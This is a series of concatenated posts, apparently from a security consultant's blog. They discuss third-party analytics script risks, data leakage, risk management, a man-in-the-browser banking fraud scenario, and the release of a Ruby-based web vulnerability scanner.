I recently had a client inquire about some of the potential risks associated with using a 3rd party web analytics tool.

Businesses normally want to use these tools to report on the behavior of users who visit their site in order to improve customer experience and measure sales performance. All that is required is for the business to include an innocuous JavaScript tag (provided by the 3rd party) into each page they would like to measure. If the user allows javascript to be run, the script is run each time a user visits the website calling a more advanced script back on the 3rd party server.

For example, let’s say I provided a web analytics service and you used me as a 3rd party. I would provide you with the below script and then you would place the following tag on every page of your website…

<script src=http://www.securitytechsience.com/sts.js” type=”text/javascript”></script>

The sts.js script on my server would then run in the user’s browser every time a user visited your site . I would then provide you a log-in page that generates pretty reports for you to see how your user base is behaving.

Sounds great doesn’t it? Now for the risks…

NB: The below risks are applicable for companies that house more than just browser ware web applications.

Integrity of the script - Maybe the script is OK today but what about tomorrow?

How could you be assured that the 3rd party wouldn’t change it? What if the 3rd party server was hacked and replaced with malicious code by someone else? If a change were to occur how long before you would notice? If you did notice then what?

The above questions really hit home to three of the core functions of information security within any organisation…

1. Change control: If the 3rd party wanted to change the script then they should notify you and this would be input to your change control process.
2. Audit & Monitoring: The 3rd party should provide this, but you could just as easily write a script that does an hourly download of the script and compares it to your known good script.
3. Incident Response: If the script were to change without prior change control notification then there should be an incident response plan to follow.

Integrity of the 3rd Party

How could you be sure that the 3rd party uses a level of security practices that are aligned with your organisation? How could you be sure that if things did go wrong you were covered?

The above questions are concerned with a breadth of business units such as operational risk & compliance, legal as well as information security. They would include questions such as…

1. Is there a contract between the third party and the organisation?
2. Does the contract include x, y, z to cover the organisaion in the event of a, b, c?
3. Does the contract include a SAS70 or equivalent?
4. Does the contract in include a monetary figure?
5. Has privacy been considered?

In most (if not all) 3rd party contracts, the above questions favour the 3rd party and not you.

Confidentiality of the Data

How can your be certain that any confidential data remains secure? How is the data (both confidential and non-confidential) transferred?

Although you may be using SSL (ie, https), the 3rd party may not and the data is transferred via http. If this is the case, then any sensitive data passed is transferred across the Internet in the clear.

Even if you are using SSL and the 3rd party is using SSL (ie, https) as well, what if the javascript is requesting http GET requests? In that case, the URI and it’s parameters are passed over the Internet in clear text. For example,

GET https://www.example.com/cc_valid.js?credit_no=123412341234&date=31122008&ccv=123

And finally, do you really want an external script running anywhere near your customer’s sensitive information?

Problem

As you can see the above solution adds some considerable overhead if you want to implement it securely in order to protect your customers data and your company’s reputation. As a business the benefits that were promised at the beginning of sales pitch may not be sounding so great anymore and you may be leaning toward building a solution in-house. Although it is a secure solution, you soon find out it comes at a much higher cost. So is there an alternative solution?

Solution

I would recommend copying the 3rd party script on a local organisational server so that the control of the script is now with you. The company is now forced to contact you when they would like to update the script. You could go even further and ask that the reporting funcitonality is housed on your network. That is, you provide the box and they provide the application. If they won’t allow you to house the application you could always set up a B2B channel with the 3rd party in the cases where sensitive data may be transferred - This channel could be over a dedicated link or VPN using an IPSEC tunnel.

Hi All

Since I began this blog I always wanted to keep the original theme of my website instead of flicking over to the Word Press default theme when the user clicked on "Blog". Well, as you can see I’ve finally done it!

So if you ever wanted to know how to keep the same theme with your blog and your site’s css then read this blog

http://max.limpag.com/2006/09/01/how-to-convert-any-web-template-into-a-wordpress-theme/

All you need is:

• Style sheet - styles.css
• Index page - index.html
• Images directory - /images
• A screen shot of your home page

Have fun!

Data leakage is becoming more “buzz” like in the Information Security arena again after a slight dip since 2004. A little disappointing if you think about it because the definition of “Information Security” is the protection of information/data from threats such as leakage. Hence, this should be the first thing on the mind of an Information Security professional at all times. Much like a well-rehearsed slogan similar to the property slogan…

It is all about data, data, data!

Hopefully companies can begin to realise how important the above slogan is before they lose their confidential data and more importantly continually remember how important it is. Unfortunately that is one of the paradoxes of Information Security that I have described above and all information security professionals must struggle with over time.

That is, when there are good information security practices occurring within a company then nothing actually happens. It’s a good and bad thing for security - Good as there maybe no data breaches and bad as the business are wondering what they are spending their money on if nothing is occuring. After a while the business will begin to cut back on spending (and hence security practices) and do things cheaper and riskier. Then certain events occur such as what we saw in 2004 when data leakage and offshoring was a hot topic. The problems either get fixed with more spending and over time data leakage again goes off the radar. Today with new threats such as phishing (or more correctly identity theft and fraud) and huge data breaches hitting the press like TJX, data leakage is on the radar again and businesses are beginning to reinvest.

The paradox can be thought of much like a sine wave oscillating over time: The greater the cost the less probability of data leakage. The less the cost the greater the probability of data leakage.

NB: The y-axis has probability and cost inverted

Next I hope to post some economic strategies to help prevent data leakage.

I have attended many a conference on risk management and also gained a few certifications in the field. This involved reading a number of books (some more long winded than others) and redoing the multiple choice questions until I was satisfied I had learnt their version of what the ‘correct’ answer was…This process was a little disheartening as I have met some great risk managers who have no certifications and met some ‘below par’ risk managers who have more certifications than you can poke a stick at.I don’t wish to bring into question the certification bodies as I believe a central body is required and their intent is to provide the most relevant information to date. Yes, I will agree with most complaints that these certifications have their flaws, but I wouldn’t say that your are better off with no certification. I think these types of questions should be redirected to the individual, their past experiences and how well they can define what risk management means to them.

This post is my best attempt “risk management” definition that turns the above questioning onto me. That is, I will try to describe in the most succinct way what I believe risk management to be in an information security context. I will do this as if I were in an interview without citing a dictionary, wiki or Google - You will just have to trust that I don’t cheat ;-)

I perceive risk as driven by two related facets. That is, the likelihood of an event occurring in combination against the impact ‘it’ will cause if ‘it’ does eventuate. That is, the lower a likelihood of an event and the lower the impact the event will have, equates to a lower risk. And conversely, the higher the likelihood and impact, the higher the risk.

Note: The ‘it’ in the above sentence would be either a ‘vulnerability’ or ‘threat’. The eventuation would be defined as a ‘threat’ that successfully ‘exploits’ the ‘vulnerability’

Now, the most important piece of the equation is the “management”. I say it is the most important as a lot of security professionals sometimes forget that without the business then there is no need for risk management. Or more simply, without the business than there is no need for you (to protect it).

The management piece to me involves defining business objectives and performing a cost benefit analysis of the risk versus the business objective. Most of the times this is best performed with a key manager from the business who knows the businesses strategic goals and short term plans. After this step, the prioritisation of risk in combination with the information resource can be more accurately defined. Based on this information, recommendations such as counter measures or mitigating controls can than be incorporated.

From here it is up to the Business Owner and the Chief Information Security Officer to decide on whether the risk should be mitigated, which costs money, or whether it can be accepted/signed off which involves no additional cost but a wearing and tracking of the risk.

Lately I have had discussions with members of my team about the increase in phishing attacks as of late. In addition, when chatting with some clients and reading Bank web sites, I read advertisements such as secure code, improvements in security with 2 factor-auth, sophisticated fraud detection systems, early warning phishing scam alerts, etc. I always find it funny when companies advertise security because they always use buzz words like the above where you could read it as “so you also do unsecure coding then?, and sometimes you worsen your security with other products?, and their are unsophisticated fraud detection systems but you have the other one?, or the other guys bought the late warning detection system but not you?…

Anyways, most of the controls listed above are an attempt to mitigate against the increase in phishing that has been occurring at an impressive rate over the last number of years. In an attempt to protect the end user, the Banks are spending a lot of money on the above controls in an attempt to finally stop phishing and if you believe the advertising spinsters, cease Internet fraudulent activities altogether. The question I am asking today is, well, does it?

In short, the above controls will mitigate and protect the end user against phishing attacks as we define them today. The unfortunate truth for the end user and the Banks is that the attack itself will morph into something new to bypass the current controls and the “Phishing” definition will need to be updated by the security word nazis or a new word will need to be created that is a subset of Phishing.

You maybe asking yourself, ”hold on, they have two factor auth, that definitely stops phishing attacks doesn’t it?”.

The classic response I give most clients is yes and no. That is, yes, it may stop the majority of phishing attacks today, but tomorrow brings a brand new day and no it may not stop it then (in the example below, tomorrow is actually today…think about it).

You see, an attack is not static and the above controls are assuming that Phishing will remain the same and once these controls are in place everything should be ok….right? Well, at least that’s what the people who are implementing or selling these systems are telling their upper management and/or clients until the project wraps up. By then it will be time to work on the next big idea as the old anti phishing project just isn’t cutting it. And once again they can say, not our fault, those hackers are really really intelligent.

I guess people who work in the anti-phishing industry might be upset with the above statements, but to be honest, it is the same kind of statement I could be making about any other “anti” security  industry, such as the anti-virus industry. That is, malicious person/s (organisation) or anti virus company releases a virus -> business and end-users are frightened and buy anti-virus software to stop the virus -> anti virus company builds and distributes anti virus protection -> business and end-user feel safe and keep renewing contract -> anti virus company and malicious person/s makes money.

Ok, maybe you think I am being too terse and a bit harsh with my words and phishing is different…Well then, how about I finish with an example…

MPack is a nice/nasty (depending on your viewpoint) piece of malware that basically takes control of a server and vulnerable clients that try to talk to that server. For example, your favourite banking server and you (your pc). To go along with the Phishing theme as promised, let’s also add an infected server that is acting as a Phishing site for your favourite bank (see below).

Banking Site                  <—–>                  Phishing Site

       |——————-You——————-|

So here is the scenario…You get an email that your Bank is doing an upgrade to their Internet Banking site and you need to log in immediately for security reasons. You click on the link that takes you to the phishing site which hosts an Mpack kit - The email is actually spam from an organised crime unit. Either your patches are not up-to-date or the MPack server has an 0-day exploit and your machine is compromised. Malware is then download to your computer unbeknownst to you. Note: In the classic Phishing attack your user name and password are stolen by you submitting this to the Phishing site. In this attack, this is not necessary (do you see the phishing attack morphing?).

On a completely different day (or any time after your machine being owned), you decide to do some Internet Banking and login to your favourite banking site. The malware that current resides on your computer (that has been happily logging everything you do as well as acting as a part time warez server and/or pr0n site) notices the bank URL in your browser. A program is now launched (again unbeknownst to you) that sits within your browser (i.e., within the session so ssl certificates, cookies, etc don’t protect you). You happily type in your username and password as you are security savvy individual and can see the padlock on the screen and enter the site.

Note: This is where the malware becomes especially important in the attack. Instead of you seeing what the bank is actually displaying to you, the malware is intercepting this and displaying what it thinks you should see. Hence, it is up to the imagination of the programmer of the malware on which attack she would like to deploy. In this case, we are only going to use one simple example where you lose all the money in your account.

Note: The malware in your browser is analogous to a person’s brain suffering from schizophrenia and hence they have a distorted view of reality.

You now browse to your account transfers section to transfer funds from your account to your local gas company. The malware is actually displaying these things to you but instead has replaced the gas company with a mule account. You click transfer and then receive either a number of images to click on or even the new and ”secure” sms service to your phone with the pin that must be answered. You click the right combination of images or enter the pin on the phone and click pay. The malware happily intercepts these values and submits the money to the mule account.

Note: I guess if the sms contained the destination account number (or part thereof) and you really were paying attention you may catch that something is wrong. That is unless the malware is aware of this and intercepts the data and substitutes the mule account number to the gas account number on the screen. Anyway, depends on the Bank’s implementation of two factor authentication.

Hopefully enough said.

Happy Banking!  

I have just completed a tutorial on how to use the STS Scanner correctly. I believe it to be comprehensive with detailed commands and screen shots but your comments would be appreciated…You can download the pdf tutorial here.

On a side note, I found an interesting blog that mentioned the Security Technology Science site. I think it is worth mentioning that this site has some really detailed and interesting blogs. For starters, here is a link to their 10 day vulnerability assessment found here. You should also check out their blog on Security Testing Tools of 2007 found here.

Anyway, one thing I would like to clarify is a past article I wrote about screen scraping. I mentioned XPath to be “complex” when in fact I should have used different wording. I should have said that I find the use of XPath when crawling an unknown site to be “complex” in comparison to the solution below. What I mean by this is that using XPath to screen scrape a page that is known to me is indeed straight forward (as long as you understand the XPath syntax and the DOM structure), but what happens when you or your tool have never seen the page before? How do I know there is an anchor tag at html/body/div[4]/div/div[2]/ul/li/a/ and not at html/body/div[4]/div/div[2]/ul/a/? Anyway, maybe there is an easy answer to this and an algorithm has already been written but at the time it just seemed a lot easier in Ruby to get all the links on the one page with one line of code…

page.links.each do { |link| ... }

Finally, the STS Scanner uses Mechanize and Hpricot to parse and spider html pages. These libraries are not able to parse and idenitify JavaScript and/or Ajax code. A separate version of the STS Scanner is planned to be developed where the internal core does not rely on these libraries and hence they shall become obsolete. The core shall act more like an everyday browser (i.e., IE, Firefox, etc) so it can hopefully branch out into other applications such as Flash and web services. So those who thought I was going to solve the Web 2.0 problem with these libraries are mistaken…

After a few minor adjustments to the scanner and some additional tweaks to the web crawler, it is time to release the very first version of STS Scanner. All the information about the scanner and where to download is available online here

Requirements:

1. Ruby Interpreter and Ruby Gems
2. Hpricot Ruby Gem

Bugs:

Send all bugs to bugs [at ] securitytechscience [dot] com

Please test responsibly…

Hello everyone!

Sorry for the delay in the release but I have spent the last few months traveling around Asia and haven’t had much time for coding, testing, debugging, etc… Also, I have been spending my weekends down by the beach enjoying myself on Sydney’s sunny shores
I promise to have a release out very soon, possible a New Years Eve treat?

Anyway, one thing is for sure and that is coding is a winter sport.

Before the release of the sts-scanner, I plan to add on some crawling capabilities as the strategy is to take the tool to a level where there is minimal human interaction (i.e., no manual crawling of the web application). Note: I am a big fan of the manual crawl, as it is possibly the best assurance you have that every link of a web application has been clicked and all forms have been correctly submitted. So the idea of building a crawler that can do perform like or even better than a human sounds like a nice challenge…

Firstly, some the obvious problems with basic crawlers are things like malformed html, frames, forms, javascript, ajax, web services, web 2.0, etc to name a few breaking the crawling algorithm. Some crawlers simply fall apart when faced with these challenges and as a result, you end up with a minimal or in extreme cases no attack surface area to test.

This blog is about how I plan to overcome some of these challenges and implement them within the sts-scanner. I will only focus on web 1.0 for now as I will concentrate on web services, web 2.0, ajax and javascript at a later date.

Read the rest of this entry »